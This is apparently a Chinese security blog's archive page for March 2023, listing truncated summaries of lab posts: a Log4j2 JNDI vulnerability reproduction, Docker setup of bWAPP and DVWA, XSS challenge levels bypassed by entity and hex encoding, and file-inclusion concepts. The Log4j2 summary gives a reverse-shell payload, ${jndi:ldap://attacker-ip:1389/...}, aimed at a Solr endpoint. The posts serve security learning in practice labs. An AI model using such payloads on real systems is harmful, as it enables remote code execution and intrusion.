03 2023 档案
摘要:【1】漏洞原理:Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议 即可)【2】复现:(1)启动靶场环境:(2)反弹shell:http://靶机ip:8983/solr/admin/cores?action=${jndi:ldap://攻击机ip:1389/Ba
阅读全文
摘要:(1)docker search bwapp,(2)docker pull 镜像名称,(3)启动容器,(4)浏览器中访问http://本机ip:端口/login.php:会出现提示:(5)访问http://本机ip:端口/install.php做数据库初始化操作,(6)重新登录,
阅读全文
摘要:docker-compose up 拉取环境出现如下报错,看到Timeout以为是网络不好,其实不然,用vim /etc/docker/daemon.json添加新的镜像地址, 再次docker-compose的时候就顺利进行了。
阅读全文
摘要:Level8:尝试利用编码绕过,代码转换机制将script中的ri变成了r_i,所只编码r和i试试(html实体编码和hex编码都可以绕过):字母十进制十六进制(hex)rrriiiscript的实体编码:scri&#x
阅读全文
摘要:Level1:(1)(2)(3)Level2:(1)(2)通过点击 “ 搜索 ” 按钮,将输入框内的内容以 get 方式提交给 服务器上的 level2.php ;经过服务器的动态处理之后又会将参数 keyword 的值插入到 <h2> </h2> 标签之中以及 添加到 <input> 标签中的 v
阅读全文
摘要:1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。2.远程文件包含漏洞:能够通过url地址对远程
阅读全文
摘要:前提,已经安装好docker。首先,搜索DVWA镜像,安装,安装完成后,docker images查看已有镜像,然后运行dvwa镜像,与容器进行交互,访问ip:端口,出现如下界面则搭建成功,点击“Create/Reset Database”,默认登录为admin、password,
阅读全文